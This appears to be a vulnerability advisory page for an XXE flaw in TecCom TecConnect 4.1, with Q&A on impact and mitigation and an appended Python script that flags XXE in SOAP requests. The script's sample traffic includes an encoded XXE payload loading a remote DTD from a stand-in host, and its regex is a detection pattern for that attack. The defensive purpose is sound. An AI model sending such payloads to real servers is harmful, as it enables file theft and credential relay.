CVE-2025-10183
BaseFortify
Publication date: 2025-09-09
Last updated on: 2025-09-09
Assigner: Black Lantern Security
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| teccom | tecconnect | 5 |
| teccom | tecconnect | 4.1 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-611 | The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-10183 is a blind XML External Entity (XXE) injection vulnerability in the OpenMessaging webservice of TecCom TecConnect version 4.1. It allows an unauthenticated attacker to send specially crafted XML payloads that exploit the XML parser to read arbitrary files from the server and send their contents to an attacker-controlled server. The vulnerability involves bypassing error message encodings and leveraging local DTDs to exfiltrate files and relay NTLM hashes, potentially leading to full system compromise. [1]
How can this vulnerability impact me?
This vulnerability can have severe impacts including unauthorized disclosure of sensitive files from the server, exfiltration of arbitrary data, and escalation to full system compromise through NTLM hash relay attacks. An attacker can read local files, capture authentication hashes, and potentially gain control over the affected system, leading to data breaches and loss of system integrity. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection can be performed by targeting the vulnerable OpenMessaging webservice endpoint, typically at openmessaging.asmx, with crafted SOAP POST requests containing HTML-encoded XXE payloads. Techniques include sending out-of-band XXE payloads that trigger DNS or HTTP callbacks to an attacker-controlled server (e.g., Burp Collaborator) to confirm vulnerability. Tools and methods used include IIS Shortname Enumeration to locate endpoints, Wsdler to parse WSDL, and Burp Suite Repeater for sending crafted requests. Additionally, monitoring for unusual outbound DNS or HTTP requests from the server may indicate exploitation attempts. Specific commands are not provided, but usage of Burp Suite with crafted SOAP requests and monitoring network callbacks is recommended. [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade from the vulnerable TecCom TecConnect 4.1, which is end-of-life as of December 2023, to TecCom Connect 5. This upgrade addresses the vulnerability. Since the vulnerable component is the OpenMessaging webservice at openmessaging.asmx, restricting or disabling access to this endpoint until upgrade may also reduce risk. Additionally, monitoring and blocking suspicious outbound network traffic related to XXE exploitation attempts can help mitigate impact. [1]
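The detection answer above notes that the XXE payloads reach openmessaging.asmx as HTML-encoded XML inside a SOAP body. The following is an added example (not code from BaseFortify or TecCom) of a request-inspection check a defender could run over WAF or reverse-proxy request logs: it decodes nested HTML entity layers before looking for a DOCTYPE that declares an external or parameter entity. The endpoint name comes from the page; the sample requests, the `decode_layers`/`inspect_request` names and the regex heuristic are assumptions of this example.

```python
import html
import re
from typing import Optional

# Entity declaration whose identifier resolves outside the document (SYSTEM or
# PUBLIC), including parameter entities ("% name"), which out-of-band XXE uses.
EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+(%\s*)?[\w.-]+\s+(SYSTEM|PUBLIC)\b", re.I)
DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)

def decode_layers(body: str, max_rounds: int = 3) -> str:
    """HTML-unescape repeatedly: SOAP calls to .asmx services often carry the
    inner XML as an encoded string, so '&lt;!DOCTYPE' evades a raw match."""
    for _ in range(max_rounds):
        decoded = html.unescape(body)
        if decoded == body:
            break
        body = decoded
    return body

def inspect_request(client: str, path: str, body: str) -> Optional[str]:
    """Return a reason string for a POST to the OpenMessaging endpoint whose
    decoded body declares a DOCTYPE with an external or parameter entity."""
    if not path.lower().endswith("openmessaging.asmx"):
        return None
    decoded = decode_layers(body)
    if not DOCTYPE.search(decoded):
        return None
    m = EXTERNAL_ENTITY.search(decoded)
    if m is None:
        return "DOCTYPE in SOAP body (review)"
    kind = "parameter" if m.group(1) else "general"
    return f"{kind} entity with {m.group(2).upper()} identifier"

# Constructed sample traffic (not real captures): a normal call, then one whose
# HTML-encoded inner XML declares a parameter entity pointing at a remote DTD.
SAMPLE_REQUESTS = [
    ("10.0.0.5", "/OpenMessaging.asmx",
     "<soap:Envelope><soap:Body><Send><msg>&lt;Order id=&quot;1&quot;/&gt;"
     "</msg></Send></soap:Body></soap:Envelope>"),
    ("198.51.100.7", "/openmessaging.asmx",
     "<soap:Envelope><soap:Body><Send><msg>&lt;!DOCTYPE m [&lt;!ENTITY % p SYSTEM "
     "&quot;http://oob.example/x.dtd&quot;&gt; %p;]&gt;&lt;m/&gt;</msg></Send></soap:Body></soap:Envelope>"),
]

if __name__ == "__main__":
    for client, path, body in SAMPLE_REQUESTS:
        reason = inspect_request(client, path, body)
        if reason:
            print(f"{client} {path}: {reason}")
```

A hit on the second sample shows the check still fires once the inner XML has been unescaped; the benign first request produces no finding.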